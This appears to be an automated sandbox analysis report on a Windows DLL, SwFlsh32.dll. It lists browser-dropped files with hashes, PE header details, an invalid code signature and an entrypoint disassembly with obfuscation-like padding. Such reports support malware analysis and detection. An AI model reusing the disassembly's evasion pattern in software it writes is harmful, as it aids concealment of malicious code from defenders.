                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\httpErrorPagesScripts[3]
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):12105
                            Entropy (8bit):5.451485481468043
                            Encrypted:false
                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                            MD5:9234071287E637F85D721463C488704C
                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                            Malicious:false
                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                            C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):534
                            Entropy (8bit):4.337466447797199
                            Encrypted:false
                            SSDEEP:12:o+y3t4qgy33MAq9quA7Mjqu2MjO+q9qujO+7MjaBBqujaBgxMIquK7:o+yLgyMAq8uAgmuBjTXujTgja6ujaKal
                            MD5:6E02D105F30B043F630CA8C810354C15
                            SHA1:CB3EB7F1F41932055EE6DEE7087956436F7A38A6
                            SHA-256:A4484EDB2740931377E454BAD6F24E489AA35C85FE5BFCA818031E2711234926
                            SHA-512:49C38911D3BA79D54C20F9CCC872900ABC90F5255324C37526D15B16A5E7FE0A02CB75F9FE6FC8D9FBD031DEB7D59303A541F8BB7E80B0CE7C9B63F5D7D0C849
                            Malicious:false
                            Preview: [2020/09/30 08:15:34.330] Latest deploy version: ..[2020/09/30 08:15:34.330] 11.211.2 ..[2022/01/12 11:10:57.040] Latest deploy version: ..[2022/01/12 11:10:57.040] 11.211.2 ..[2022/01/12 11:11:42.353] Latest deploy version: ..[2022/01/12 11:11:42.353] 11.211.2 ..[2022/01/12 11:12:12.260] Latest deploy version: ..[2022/01/12 11:12:12.260] 11.211.2 ..[2022/01/12 11:12:38.008] Latest deploy version: ..[2022/01/12 11:12:38.008] 11.211.2 ..[2022/01/12 11:13:07.717] Latest deploy version: ..[2022/01/12 11:13:07.717] 11.211.2 ..
                            C:\Users\user\AppData\Local\Temp\~DF00219A48C88D660D.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.298261600976148
                            Encrypted:false
                            SSDEEP:12:i9lUqatFy7ilFJz6wLYh71bdNDUwdZqW2HwKzAb7FfET2Cp4/F:i9lUpy83Ah71DAwdZq6hET2g4
                            MD5:2BA7B5AA41684E39F3985049212A532B
                            SHA1:E5D2ECD326C06FE7428713CD6A5E881F89FBE5E5
                            SHA-256:449FC37D59725BB60782227C75E66957C8E765F06491E76DF468D1B8B521E048
                            SHA-512:56885E179A23B96A6C5FA7676D69E6A810229BD322F75D9C3A0236BEEDF98FE29C6515012E222E3223E2023C00C3C0AF97B8597627B96942014730FE8A0B542B
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF293D22C6DD783050.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.13513145224195933
                            Encrypted:false
                            SSDEEP:3:Xd+WeAfRJf+AfRt+AfRveAfRRl2RAfRmZ60RAfRRl2RAfRmZ60RAfRRl2RAfRmZ1:XdpzhXlk60ilk60ilk1
                            MD5:6174E26DFCEDD4F064509C73A7927502
                            SHA1:5F6BAD374EDA7495C73E9560ABD1E6F279E49EDF
                            SHA-256:0F1625F217A7904F0EEF15994E7C623E7A638B8459B8E7C83AB474503B5ED6D0
                            SHA-512:D15AEA548A27A831273C087455EC61F561E40B869E92A5E68B4448A92583B9A38F40A6F3278B2509AA5822DC0E07067A5DE8CFEA97D3F1A7957DB0B2DA6E1481
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF2AF264C75EBCEA8B.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.28995949346732525
                            Encrypted:false
                            SSDEEP:12:i9lAatTfXJzqI92lic9XNZybyPzMOgTmkZI/OPCrxSgQi/P8pX0EoIq/F:i9lxfX9LMXKYMOqpZXIxSPE8pEDIq
                            MD5:268D6D245C614D6D6CA307EF9CAA766E
                            SHA1:75BB35DEF6230CB9A1FDABC0565379373C6D7F12
                            SHA-256:9592FE294024831D99FA2BF497404D61CD97266CBAC8AB45E3A1624A20879523
                            SHA-512:F814DB0C828ECAD8AFBD0CAAB8E18F23A7F9B792B9375DF3D26D9214F07E2280CD3C2E7CEABF762559024D6DC8D463E98F7390DD90C8A67D77EBE807941642E6
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF2E9EF23EC6AEF09A.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.29394246977531674
                            Encrypted:false
                            SSDEEP:24:i9lRht/2L/Sq3eF7wnxzG87Fh1o+MtiUV:cn2LMMxJFc+ui
                            MD5:DE760EEFE507F9903465FD9AE309642E
                            SHA1:90B807E381B1C0D44097C05CF0568FE9E1CD36A1
                            SHA-256:CA1640C058F4241162185D10D8AE97B9087DCB32FDAFD8A355E42922A19D3F7D
                            SHA-512:CB09334AB88F81450A34B496EBDF9692AA8E6A199C88A44182FC59A2FEB125C696234075887E8EDC87C345379DFD635BDA0E0B170FB8B0956B8404DDA7CA9277
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF339404E807FEEA02.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2902745485458019
                            Encrypted:false
                            SSDEEP:12:i9lkatH/O1fzozL1ICOVbKBZXo1dmpry0lPz3MSotJHwlAlkHQiHNSx/d:i9lx/i7WmbB1CrnlPzcDcRNq
                            MD5:3B77C922ECAAFEC3FD8C2CBE53B6F438
                            SHA1:1B6160512695C4AC43F69613A955FBF37DC9C9DC
                            SHA-256:D7C63637B634FCF065A4655EACCC9D5EA02C253BCE4E80E0DAB9EC1A70FEA700
                            SHA-512:1964C21E5009A99B5C8E2AE1601E04B6769884BA0474CA3FA028839CE2C12AF36645E7CFBCA23B1A80B18F20F18C28E8541F3DBA37E5513EB36ED0C8A60AF822
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF41A1F7D3BF9CD14A.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.13572565008702217
                            Encrypted:false
                            SSDEEP:3:YRy7tR0hHR2ymZRRlfWJZRHM7aWJZRRlfWJZRHM7aWJZRRlfWJZRHCll:9lUBWXlUBWXlUS
                            MD5:4A51CD50AB2B82423A3F10DF03D21C4A
                            SHA1:FE6D4B532188BB355377CC56D394FB291D5B527A
                            SHA-256:D2515443A5504D245327075A46CD831CC2849C0100752DCD6B781674880E3B8D
                            SHA-512:B1D1E79D83E499C4E2F1C2CCD8A6ABA5A8160E92D771C807ECB21BD099E488B12FDF08493DEC160FAF0FA5B462DBB73E237D4F974E921F6C4BD42F07C23381AA
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF49CB3B88D34074CE.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.11909954344822574
                            Encrypted:false
                            SSDEEP:3:k0nZRlRqTiZRAHRRl1R2gKMRRl1R2gKRBmZRrtl:k0nNcXlHZlHSc
                            MD5:99450042E756F77C5E70E3398F32F722
                            SHA1:04F041A4E8E07EA3B04B36D98ED1EC8A7E5E1BF7
                            SHA-256:5100E2C56202B6C96F3D8343018A983E1C9F9B683F87E35A3E1EA40D22E9B766
                            SHA-512:6CD25EBBB3E4F1E1BE02F8FF159EC5C13669B8819B78B2DE5821D045F0757BF4E96C6C1F74EF4CDEC0C6876069A0649BF418D63597C5C89664DF51F18A5F0334
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF4D98D6FEBC0AA729.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.3026279194035307
                            Encrypted:false
                            SSDEEP:12:i9lgqatZyLqtz71G4a35uVxeA6UznnpasmjZNauPKMX6HB/Ald7AU3HkakR1veWd:i9lgymR7N0WnpJSZcwKH5Al5AV1Rj
                            MD5:3B9E75C399525ED91F18EF35BE1C8FC4
                            SHA1:91D2497DA5B9C88860DE175C59ACB9DE083702C3
                            SHA-256:F435A1D56A1AA6518BEE2F8E56E65B61D91E4835E45705D74538797CA0FD63D8
                            SHA-512:EB4E4A2D57BED29773F3303227E95835645E7641DDA75D1EFFE418D1D0AAE9AB8E9447234EEF3A0BDF958FC121C48562C1A2032C63E10381AB65C3E12F5614CF
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF584F6E0A1DD704BA.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2971233076843748
                            Encrypted:false
                            SSDEEP:24:i9l2lzove6PiHx9405gBtSQbp8xlZZovgs8IwcF:PlzoraHU0gHbp8x2vgI
                            MD5:2946C6DB3183923B01903B8E32F94983
                            SHA1:5BAD1411061142D7797790EC1B1504578409D015
                            SHA-256:07D8159D2C02E3F2BFF5076C7131D2517FE5E88170456F5386E97524E6380EBC
                            SHA-512:3B266024C01E59D56918E5CA609115D8E431A5B02BE4E0D564FC61E6072A07BC2978CEF49ACF37B284A0F2F0CED8DF21E240E11E4796E76C3A1D8F7A9D69284A
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF5AFE25FDEA321026.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2944781719026294
                            Encrypted:false
                            SSDEEP:24:i9l8T/sdWw1UaqQxrL6lA9WNwIrBoUjZ:PmWw1U/QxHW5N
                            MD5:EDA9C5FC46C9BDA33E5E20B0A2EC313E
                            SHA1:468350B882512EC251933CD51C77C5C9A9D06688
                            SHA-256:12F0F1C6CAF47A748DAFB369EB6BD0C428CE1D9F0946007DA5EC409A2CDA49BA
                            SHA-512:AF6188FA1327D89443C40909CAEC3D83850D141C1F55E3AABF66EAF8FE30EC5331D60F314AD985F3063741BFC3E93850A4DB345E1978B9B2A71B8BD0527C7182
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF635DEF1629836875.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2896153212161717
                            Encrypted:false
                            SSDEEP:24:i9lxY/EoRul/KmTcc3lhzeD9n40o2OQnM:0Y/EoYl/TL3TzeZ/OQ
                            MD5:21873639BB8F45BCCD6377D2C1D5C6C4
                            SHA1:A15A57502C765AA605AE506349D8BF05BC7A191B
                            SHA-256:61879120BA4C02A5C31C7A14DAEC0B720034E6B073E01625A41137E6E975ECE4
                            SHA-512:2787E42CA358A1DCDF28D1D6A6FC956D74D41A53C9F6A19488C50AE390E83139DDDE7808CB4F1A1F025E8FB32A2DC0BA69F2EB5EBCADC61881470208BA0F5253
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF6BE4FBC691CAB6A8.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.29485821940886553
                            Encrypted:false
                            SSDEEP:12:i9lcat/70BrYcWlL6wM2PMlKO4FRtlAkrKcvcl0UlccRxPg+nQOS3Cz/0/OnSq/F:i9lR70WOwDrFRtOkrf7+QOSyz0/mP
                            MD5:FF87C9557AF17F715DDEF2A7B5288878
                            SHA1:49D7E3784101D520286E57034E694A7D8EF82CC0
                            SHA-256:72A1DB766F5720BAC2AB28751887D30233B92E9045114336001DB9C47E88789D
                            SHA-512:934836CCC50B56381FB7D4B2EE55181107BF2E4CDFC78B0C17424374DA53D464CD5CE6E92CDA9B36290ABB492A5772319BC1E855146B0E7592A647401370314B
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF707819B1326D6F2F.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.13572565008702217
                            Encrypted:false
                            SSDEEP:3:rpHRbRR+2vZRyCRRlZRRLZO+uRRlZRRLZO+uRRlZRRLZ/lll:rppdvDlm+ilm+ild
                            MD5:387335ADD41CDC8547FA6455918527CB
                            SHA1:209EC6D487E93338929B12C772DA326BF4594F39
                            SHA-256:9DDE74B0A76FBE3555762685ECDAB778456E5D30609A3605462574A41BF0C28F
                            SHA-512:51D5718548996C91F485E0092655A0FDCC523EF93E2128BB67B14D6078865ABAF2673169EF82311ABC93F3ADD03A35D39543CEB25570F787543B7482F6429490
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF8B1684F7EAB925CF.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.3018784134435107
                            Encrypted:false
                            SSDEEP:12:i9lgqatZyD/rkl+UTbbaJcryibq/67OKVIWLey4j9z7yywymOwZhmWpId5F77w/d:i9lgyzrs+LSLO62WLcBwyvwHpIdn8
                            MD5:4045FEF129A8652D2736741108948918
                            SHA1:1997041C3BCA61970805D746C7EC1C2DBA1E977C
                            SHA-256:BB64A1E2AB26963047045B17ADDFC16FF27FAE0C1EEA2296CE3BF1A5755AF399
                            SHA-512:77D7075F07AE11D1CDD26E92CF25E077390407F83CA0043C71D87AF6B4D406C46FD2CADE3FBFD849AB8EE0BC4FFCE201265D34B994E1ACFA62C2193B21666F2C
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DF9FDA9051406EE21F.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2934934173551704
                            Encrypted:false
                            SSDEEP:12:i9lcat/0d0CprumQIR3KU2vwDwiUU2Md6vzJa4RAaagZl/lw/5wsR9F/KYk/F:i9lRW0h/cK9j86xRgyLQP/Xk
                            MD5:59DBCFB50086A1670D8E18A21A2D5987
                            SHA1:F42296AD8A67191D189C481A3B3B50746D316DB3
                            SHA-256:2ED9B22A071DDC99590AFA02F4933E229BE4CE58F3BE2E814DD2FD3712A96EEE
                            SHA-512:A682C0F6D9321DFF4E1929094F8286B03CF2B5429705327E7B90BDD787E77BE747A1E78822B4993B99F4EC3CF71F2084044EF0329643FA0CE28F135BF7946945
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DFB3283CE4740C455F.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2950747898954717
                            Encrypted:false
                            SSDEEP:24:i9l8TXQWewl2zXhwLmgPQqBTnzSH7MXclq6Nv0v8XKtIe:PgW/mRwLUMXU3XKt
                            MD5:6A5D41E3EA39C14DA306B38FED811757
                            SHA1:6D1C0C30AB16D114814CA6065116D831DB50BAE5
                            SHA-256:1A51EA46E57AE4551B3F0CD127B97EC3E6B60CFDF986C8708E1DE864FCF4ABB8
                            SHA-512:78A56F3947CF037BA0C132E99B741C035D64BE23D435903C5A177EB803EF24639BD2495514DF2F5CB9C298D407C6B4AB3C8B91754754013884A39A85226AE58C
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DFBDA07BC0B99F7EB4.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2998500511013002
                            Encrypted:false
                            SSDEEP:12:i9lIqat0VJz307soKoB7OTqqnpwS4Ng3mcTn4WDqrzEeyVy4It1Tevqtm3ee/F:i9llV93u5Btc531T5qrd9oH3h
                            MD5:78223B76BD49AF11B486881FC6B7F550
                            SHA1:77EA5988D7297ED6D01E3094DDEA03CF0A72567F
                            SHA-256:7AA9CC265828DA6D2FFE2EEA0FB18BF242256122A10720F898041AD80753FAB9
                            SHA-512:0EE3A1A00D74DF430C7D74E6ACF1E5EF90ACE2CB56B9AF92AEA5F392BA661D95554157A1CA6E4B89D485CFCF2DFF56C8CBB7500C1A7F9C9A6CD9517174A16656
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DFE80EA9EDE4764E6F.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.28918232451133286
                            Encrypted:false
                            SSDEEP:12:i9lMatvBiz/MWPTOM8BVZ/Tl55KgbjgnlwgSlvbSKoBUQiIEb63GIs6lQwev/F:i9lxUjMWPvW3/j4WvbfUUQiIEbVa1s
                            MD5:7B608E6AFE5FD272D05861539FDD2D2C
                            SHA1:C6620C443BA0A4648A0ED4D48B1177AA0CD6370B
                            SHA-256:5C6006479D427CA0BC6CCCFB379834FD61FEE83AC4EDBC28BD6973946E240F8B
                            SHA-512:E9F13B4BADDFF1CE964BB33302E5917CC32EBEE27A74A011167888A2645B795CCB29AB61E6FE66D78F6ECB0F86C1F2B56EA69CBCCF4B41BA8FC27BF4DAEB6C94
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DFE8DA32CC9CDDB9AE.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.08227640189903279
                            Encrypted:false
                            SSDEEP:3:aQZRRlLRj57dilclllv/nt+lybltll1lRslkhlEkllaaRBGZRrtl:a2lEUFAlkxi4GX
                            MD5:191F7781E8F22B2B06A90B62EA339174
                            SHA1:5478AB5F4BE84BC1B3F4DB73FEB255E8C205C4BF
                            SHA-256:2F1C9D037CEEF52082325C3EA4E17532AA93F072173828334570466920896793
                            SHA-512:462F4DE1AF26D72BE8AA6FB7F3CC37330F10C233B8327A1FB20D625F4F9694E766B17A83C33A856060746A676FF6849197D59A9FFB0CDEAD6AFC257D957C855B
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DFECE1085EE4C694FA.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.3092236238473855
                            Encrypted:false
                            SSDEEP:12:i9lQqatc3zoUjkXzkGpGOqwZdsmrWKy1qd6IHv+YbRq05WHJ1KI+dRUr7Yffww8V:i9lV3zoUjoThq2dsmrPg7YKGRUrM8
                            MD5:2BE24DF8A8A3DDFA55AA0931DCD4ACB8
                            SHA1:AC1D0FC847B0F01B0722FFE096790F0BD964DAC2
                            SHA-256:51B524F987B11B40357344D78B02155AD2AC459273D737847FC2013B884D5A6B
                            SHA-512:3030CE63EE8C8D33F54E68A25AD924257044CF7DB54FB1483F5BE10C9BD9328AC4613E1A4954E31117C8EE65B5CEE380A5190151D0A2D10CB01F76F63C85F421
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\~DFEFA0E4FB69B66F60.TMP
                            Process:C:\Program Files\internet explorer\iexplore.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):16384
                            Entropy (8bit):0.2953733300724363
                            Encrypted:false
                            SSDEEP:12:i9lQatjnP/klVzfEMkKsoumtEvp5O+z9f8h2tymWdtkPKloFXUmGBTgZn+v3Jk/d:i9lRnPslpXkOrmXpzdhyli+Q9CgZn
                            MD5:D8203A8B3124168E8CD642681D728771
                            SHA1:83CE3BE3D02F1DFF934120753F48DE0FDF46EF48
                            SHA-256:B6635388ECFC8C31999E1A08E03555863B7BC51AA61E414C20F344205B3072E7
                            SHA-512:35E77C3D2E15ECAA07DF7E83BE728A055BF2AA9A2581CE891BFA473713F46827E0802E78F9F9F4BCD55F4C8482495E57DCA3FE847A94DCCDE9965116ED4D5FAC
                            Malicious:false
                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:MS-DOS executable, MZ for MS-DOS
                            Entropy (8bit):6.113226170394267
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:SwFlsh32.dll
                            File size:837824
                            MD5:4081fd95a87905a998b314f7bb4e8b14
                            SHA1:e9644e9686e3d5bc0f94099359520506722e601f
                            SHA256:45f11d97a8ed1a9215e9c6c8d44335229e17bd63bb0a48abcc8c2a02dca241c4
                            SHA512:e3b59c69a25bc92d076595246cc13792074fa0e14cef22708b9c21dc44447b432c40881b9d6b1925b9002d4b90edba563dec00697ab3c5b28c760eb7b3a97779
                            SSDEEP:12288:ciSPiNOWyw9WVsLhpAkmw3bmR9sIvQ2q5lJlGe+as4frkb3pDNg:cfqy9YhuHwbzIvQ5lJl0M
                            File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!................&...............................................M...............................:...S..

                            File Icon

                            Icon Hash:b278e4d2e0f479b2

                            Static PE Info

                            General

                            Entrypoint:0x1009b626
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                            DLL Characteristics:
                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:1
                            File Version Major:4
                            File Version Minor:1
                            Subsystem Version Major:4
                            Subsystem Version Minor:1
                            Import Hash:6299c55186fab34c5992194e04e88327

                            Authenticode Signature

                            Signature Valid:false
                            Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                            Signature Validation Error:The digital signature of the object did not verify
                            Error Number:-2146869232
                            Not Before, Not After
                            • 10/7/2013 5:00:00 PM 1/6/2017 3:59:59 PM
                            Subject Chain
                            • CN=Symantec Corporation, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Mountain View, S=California, C=US
                            Version:3
                            Thumbprint MD5:267120FE3EB6CCDEDB5E9D1DF010D148
                            Thumbprint SHA-1:BE894F99B870DA5FCA623F7F4A85D3970A46CDE1
                            Thumbprint SHA-256:1027231435DC91FB074E1D89672E5186A015E74079B8CC69A4CE68493D6B49C9
                            Serial:12DB9E53539B8E248BC77DD2BA611167

                            Entrypoint Preview

                            Instruction
                            push esi
                            pop eax
                            mov eax, 100B66DEh
                            push eax
                            call dword ptr [100A01E0h]
                            cmp eax, 00000000h
                            je 00007F00C0EA0185h
                            mov edx, 100B7A5Eh
                            push edx
                            push eax
                            call dword ptr [100A01ECh]
                            mov ebx, eax
                            cmp eax, 00000000h
                            je 00007F00C0EA01A3h
                            push 00000000h
                            call eax
                            cmp eax, 00000000h
                            je 00007F00C0EA01A4h
                            push eax
                            call dword ptr [100A01A0h]
                            mov ebx, eax
                            push 1009BB0Eh
                            mov ebx, eax
                            mov ebx, eax
                            mov ebx, eax
                            mov ebx, eax
                            mov ebx, eax
                            mov ebx, eax
                            ret
                            je 00007F00C0EA0146h
                            je 00007F00C0EA0146h
                            je 00007F00C0EA0146h
                            je 00007F00C0EA0146h
                            push dword ptr [esp+14h]
                            push eax
                            ret
                            pop ecx
                            add edi, 03h
                            lea eax, dword ptr [edx-03h]
                            push edi
                            je 00007F00C0EA0146h
                            test edx, 00000003h
                            push dword ptr [esp+14h]
                            xor eax, eax
                            push ebp
                            mov ebp, esp
